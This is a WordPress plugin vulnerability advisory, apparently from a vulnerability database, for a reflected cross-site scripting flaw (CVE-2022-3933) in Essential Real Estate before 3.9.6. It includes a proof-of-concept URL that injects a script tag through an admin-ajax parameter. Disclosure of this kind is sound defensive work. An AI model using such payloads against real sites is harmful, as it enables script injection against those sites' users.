WordPress Plugin Vulnerabilities

Essential Real Estate < 3.9.6 - Reflected Cross-Site-Scripting

Description

The plugin does not sanitize and escapes some parameters, which could allow users with a role as low as Admin to perform Cross-Site Scripting attacks.

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E%3C!--

Affects Plugins

Plugin icon
essential-real-estate
Fixed in 3.9.6

References

CVE
CVE-2022-3933

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified
Yes
WPVDB ID
6395f3f1-5cdf-4c55-920c-accc0201baf4

Timeline

Publicly Published
2022-11-17 (about 1 years ago)
Added
2022-11-17 (about 1 years ago)
Last Updated
2022-11-24 (about 1 years ago)

Other

Published
Title
Published
2024-01-04
Title
Ajax Search Lite < 4.11.5 - Reflected Cross-Site Scripting
Published
2017-10-16
Title
Easy Appointments < 1.12.0 - Cross-Site Scripting (XSS)
Published
2023-07-07
Title
Social Share Boost < 4.5 - Admin+ Stored XSS
Published
2022-06-22
Title
404s < 3.5.1 - Admin+ Stored Cross-Site Scripting
Published
2021-06-15
Title
RSS for Yandex Turbo < 1.31 - Admin+ Stored Cross-Site Scripting